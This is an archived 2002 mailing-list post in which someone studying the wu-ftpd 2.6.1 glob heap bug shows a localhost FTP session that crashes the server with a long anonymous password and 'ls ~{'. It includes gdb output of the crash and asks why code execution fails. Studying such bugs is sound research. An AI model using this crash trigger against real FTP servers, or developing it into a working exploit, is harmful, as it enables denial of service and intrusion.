> Hi !
> I'm studing vulnerability of ftp servers and testing the glob heap
> vulnerability of wu-ftpd server (version 2.6.1 installed on linux
> RedHat 7.2) .
> I tried to attack the server following this technique:
> I logged in as anonymous user an d I send a lot of 'a' as
> Password.
>
> As you can see this is my computer:
>
> ftp> open localhost
> Connected to localhost (127.0.0.1).
> 220 sasha FTP server (Version wu-2.6.1-18) ready.
> Name (localhost:root): anonymous
> Password: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
> 230 Guest login ok, access restrictions apply.
> Remote system type is UNIX. ftp> open localhost
> Connected to localhost (127.0.0.1).
> 220 sasha FTP server (Version wu-2.6.1-18) ready.
> Name (localhost:root): anonymous
> 331 Guest login ok, send your complete e-mail address as password.
> Password:
> Using binary mode to transfer files.
> ftp> ls ~{
> 227 Entering Passive Mode (127,0,0,1,241,205)
> 421 Service not available, remote server has closed connection
>
>
> And this is the debugging section on the attacked machine:
>
> 1405 ? S 0:00 ftpd: accepting connections on port 21
> 7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
> 26256 ? S 0:00 ftpd:
> sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> 26265 tty3 R 0:00 bash -c ps ax | grep ftpd
> (gdb) at 26256
> Attaching to program: /usr/sbin/wu.ftpd, process 26256
> Symbols already loaded for /lib/libcrypt.so.1
> Symbols already loaded for /lib/libnsl.so.1
> Symbols already loaded for /lib/libresolv.so.2
> Symbols already loaded for /lib/libpam.so.0
> Symbols already loaded for /lib/libdl.so.2
> Symbols already loaded for /lib/i686/libc.so.6
> Symbols already loaded for /lib/ld-linux.so.2
> Symbols already loaded for /lib/libnss_files.so.2
> Symbols already loaded for /lib/libnss_nisplus.so.2
> Symbols already loaded for /lib/libnss_nis.so.2
> 0x40165544 in __libc_read () from /lib/i686/libc.so.6
> (gdb) c
> Continuing.
> Program received signal SIGSEGV, Segmentation fault.
> __libc_free (mem=0x4015ad68) at malloc.c:3136
> 3136 in malloc.c
> Taking a quick peek at the stack
>
> (gdb) info stack
> #0 __libc_free (mem=0x4015ad68) at malloc.c:3005
> #1 0x80587c9 in blkfree (av0=0x8086d8c) at glob.c:619
> #2 0x8056556 in yyparse () at ftpcmd.y:1158
> #3 0x804bd05 in main (argc=0, argv=0xbffffba4, envp=0xbffffbb0)
> at ftpd.c:1329
>
>
> (gdb) x 0x8086d8c
> 0x8086d8c: 0x4015ad68 <- this is where av0 pointed (begging of
> the heap!!)
> (gdb) x 0x8086d8d
>
> 0x8086d8d: 0x614015ad
> (gdb) x 0x8086d8e
> 0x8086d8e: 0x61614015
> (gdb) x 0x8086d8f
> 0x8086d8f: 0x61616140 <- the start of the a's...what pointer mem
> became.etc.
>
> As you can see the parameter passed to the function __libc_free() is
> 0x4015ad68 stored in 0x8086d8c (block_free's parameter), and the start
> of a's (my password) is 0x8086d8f.
> I repeated my attack a lot of time (changing the length of password)
> and never any a's was passed to the __libc_free() !
>
> How it is possible execute a malicious code on the server if I can't pass
a
> particular address to __libc_free()?
> It seems that the address passed to the __libc_free() is always fixed by
the
> system and it's impossible to change it by sending commands to the
server.
>
> Can you, please, explain me where are my mistakes in my method?
>
This archive was generated by hypermail 2b30 : Tue Oct 29 2002 - 15:12:42 PST